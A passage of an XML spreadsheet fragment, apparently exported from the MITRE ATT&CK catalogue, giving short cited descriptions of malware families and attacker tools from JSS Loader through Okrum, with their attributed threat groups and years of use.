    <t>[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)</t>
  </si>
  <si>
    <t>[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t xml:space="preserve">[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)
</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019)  since at least 2020.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)
[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as &lt;code&gt;net1 user&lt;/code&gt;.</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
